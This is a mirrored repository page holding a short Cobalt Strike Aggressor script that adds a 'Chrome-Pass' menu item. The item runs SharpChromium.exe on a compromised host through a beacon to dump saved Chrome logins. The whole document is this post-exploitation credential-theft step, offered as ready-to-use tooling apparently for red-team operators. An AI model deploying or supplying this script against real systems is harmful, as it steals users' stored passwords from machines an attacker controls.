mirror of
https://github.com/timwhitez/Cobalt-Strike-Aggressor-Scripts
synced 2026-06-08 17:50:44 +00:00
9 lines
202 B
Plaintext
9 lines
202 B
Plaintext
sub chrome_password{
|
|
bexecute_assembly($bid, script_resource("modules/SharpChromium.exe"), "logins");
|
|
|
|
}
|
|
item "Chrome-Pass"{
|
|
$bid = $1['@'];
|
|
chrome_password($bid);
|
|
}
|